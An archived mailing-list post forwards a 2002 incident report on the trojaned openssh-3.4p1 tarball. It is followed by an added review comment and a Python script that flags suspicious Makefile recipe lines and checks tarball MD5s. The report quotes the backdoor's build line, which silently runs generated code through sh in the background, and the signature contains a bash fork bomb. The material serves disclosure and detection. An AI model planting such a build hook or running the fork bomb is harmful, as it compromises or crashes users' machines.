openssh-3.4p1.tar.gz on changing rather than frozen

Magnus Bodin magnus at
Thu Aug 1 21:39:22 EST 2002

On Thu, Aug 01, 2002 at 09:20:29AM +0200, Wojtek Pilorz wrote:
> I have seen that file
> is continuously changing.
> This seems strange to me as I expected it should be a 'frozen' file;
> The signature and diff file are still dated Jun 26.
> I am wondering whether this is intentional.

Read, read: 

----- Forwarded message from Edwin Groothuis <edwin at> -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <edwin at>
To: incidents at
Subject: openssh-3.4p1.tar.gz trojaned


Just want to inform you that the OpenSSH package op
(and probably all its mirrors now) is trojaned:

The OpenBSD people have been informed about it (via email to
deraadt at and via

The changed files are openssh-3.4p1/openbsd-compat/
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
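
Review bot: the recipe line added under `all:` executes code at build time, which a target that only depends on libopenbsd-compat.a has no reason to do. It compiles bf-test.c, runs the result, redirects its output to bf-test.out and hands that file to `sh` in the background (`&`), and the leading `@` keeps make from echoing the command. Drop the line, and compare the tarball against the known-good checksum before running make on it.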

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to a
server running on (

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57


Edwin Groothuis      |            Personal website:
edwin at    |    Weblog: 
bash$ :(){ :|:&};:   | Interested in MUDs?
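
An added example (not part of the original message and not OpenSSH code): a Python check that flags Makefile recipe lines with the traits of the one reported above, and classifies a tarball by the two MD5 values quoted in the report. The heuristics, the function names and the sample Makefile are assumptions made for illustration.

```python
import hashlib
import re

# MD5 values quoted in the forwarded report.
FREEBSD_PORTS_MD5 = "459c1d0262e939d6432f193c7a4ba8a8"
TROJANED_MD5 = "3ac9bc346d736b4a51d676faa2a08a57"

# Heuristics chosen for this example (assumptions, not a complete rule set).
CHECKS = [
    ("runs a program out of the build directory", re.compile(r"(?:^|[;&|]\s*)\./[\w.-]+")),
    ("hands a file to sh", re.compile(r"(?:^|[;&|]\s*)(?:ba)?sh\s+[^-\s]")),
    ("leaves a background job", re.compile(r"(?<!&)&\s*$")),
]
TARGET = re.compile(r"^([^\s:#=][^:=]*):(?!=)")

def classify_tarball(data: bytes) -> str:
    """Compare a tarball's MD5 with the two digests from the report."""
    digest = hashlib.md5(data).hexdigest()
    return {TROJANED_MD5: "trojaned", FREEBSD_PORTS_MD5: "matches-ports"}.get(digest, "unknown")

def scan_makefile(text: str):
    """Return (line_no, target, reasons) for recipe lines worth reviewing."""
    findings, target = [], None
    for no, line in enumerate(text.splitlines(), 1):
        m = TARGET.match(line)
        if m:
            target = m.group(1).strip()
            continue
        if not line.startswith("\t"):  # recipe lines begin with a tab
            continue
        recipe = line.strip()
        silent = recipe.startswith("@")
        recipe = recipe.lstrip("@-+ \t")  # drop make's recipe prefixes
        reasons = [name for name, rx in CHECKS if rx.search(recipe)]
        if reasons and silent:
            reasons.append("echo suppressed with @")
        if reasons:
            findings.append((no, target, reasons))
    return findings

# Constructed sample: the added line from the report inside a made-up Makefile.
SAMPLE = (
    "all: libopenbsd-compat.a\n"
    "\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &\n"
    "libopenbsd-compat.a: $(OBJS)\n"
    "\t$(AR) rv $@ $(OBJS)\n"
)

print(scan_makefile(SAMPLE))
```

A hit is a prompt for manual review, not a verdict: legitimate build systems also run generated helpers, so the value lies in diffing findings between a release and the copy you downloaded.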

More information about the openssh-unix-dev mailing list